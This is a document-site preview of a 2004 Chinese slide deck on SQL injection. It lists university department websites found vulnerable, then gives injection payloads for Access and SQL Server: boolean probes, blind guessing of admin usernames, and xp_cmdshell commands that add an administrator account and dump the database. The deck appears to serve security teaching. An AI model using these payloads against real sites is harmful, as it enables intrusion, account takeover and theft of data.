下载此文档

SQL注入漏洞全接触.ppt


文档分类:IT计算机 | 页数:约13页 举报非法文档有奖
1/13
下载提示
  • 1.该资料是网友上传的,本站提供全文预览,预览什么样,下载就什么样。
  • 2.下载该文档所得收入归上传者、原创者。
  • 3.下载的文档,不会出现我们的网址水印。
1/13 下载此文档
文档列表 文档介绍
SQL注入漏洞全接触
周平
2184254
2004-5-11
网站评比中发现的问题
经济学院 serv-u版本太低, 对于新闻的ID传入没有进行过滤,网上办公系统也有很大漏洞
外文学院 ID传入没有进行过滤
软件学院 站内搜索没有对'进行过滤
台湾研究院 ID传入没有进行过滤,开放SMTP,NNTP等不必要服务
管理学院 serv-u版本太低, SMTP匿名发送,ID传入没有进行过滤
厦大医院 ID传入没有进行过滤
党委宣传部 ID传入没有进行过滤
化学化工学院 ID传入没有进行过滤
校工会 ID传入没有进行过滤
党委组织部 ID传入没有进行过滤
职业技术学院 ID传入没有进行过滤
图书馆 ID传入没有进行过滤
国际处 ID传入没有进行过滤
人事处 ID传入没有进行过滤
法学院 ID传入没有进行过滤,serv-u版本太低
资产与后勤事务管理处 ID传入没有进行过滤
SQL注入原理
?id=772‘
Microsoft OLE DB Provider for ODBC Drivers 错误'80040e14'
[Microsoft][ODBC Microsoft Access Driver] 字符串的语法错误在查询表达式'id = 772'' 中。
/,行31
说明:
ess
程序没有对于id进行过滤
数据库表中有个字段名为id
判断能否进行SQL注入
://?id=772 and 1=1
://?id=772 and 1=2
如果1显示正常,
2显示错误,或者没有页面, 则表明可以进行
SQL注入
判断数据库类型
?id=772 and user>0
user是SQL Server的内置变量
(select count(*) from sysobjects)>0 (select count(*) from msysobjects)>0
如果1正常,则表示Sql server.
注入方法
(A) ID=49 这类注入的参数是数字型,SQL语句原貌大致如下: Select * from 表名 where 字段=49 注入的参数为ID=49 And [查询条件],即是生成语句: Select * from 表名 where 字段=49 And [查询条件] (B) Class=连续剧这类注入的参数是字符型,SQL语句原貌大致概如下: Select * from 表名 where 字段=’连续剧’ 注入的参数为Class=连续剧’ and [查询条件] and ‘’=’,即是生成语句: Select * from 表名 where 字段=’连续剧’ and [查询条件] and ‘’=’’ (C) 搜索时没过滤参数的,如keyword=关键字,SQL语句原貌大致如下: Select * from 表名 where 字段like ’%关键字%’ 注入的参数为keyword=’ and [查询条件] and ‘%25’=’, 即是生成语句: Select * from 表名 where字段like ’%’ and [查询条件] and ‘%’=’%’
猜表名
ID=49 And (Select Count(*) from Admin)>=0
表名猜出来后,将Count(*)替换成Count(字段名),
and (select top 1 len(username) from Admin)>0 猜用户名长度
and (select top 1 asc(mid(username,1,1)) from Admin)>0 猜用户名
利用系统表注入SQLServer数据库
id=1;exec master..xp_cmdshell “net user name password /add”–
创建系统用户
Id=1;exec master..xp_cmdshell “net localgroup name administrators /add”-- 把该用户加入administrators组
id=1;backup database 数据库名 to disk=’c:\inetpub\’;-- 备份数据库…..
绕过程序限制继续注入
where xtype=’U’
where xtype=char(85)
防范方法

SQL注入漏洞全接触 来自淘豆网m.daumloan.com转载请标明出处.

非法内容举报中心
文档信息
  • 页数13
  • 收藏数0 收藏
  • 顶次数0
  • 上传人cczggg
  • 文件大小0 KB
  • 时间2014-01-16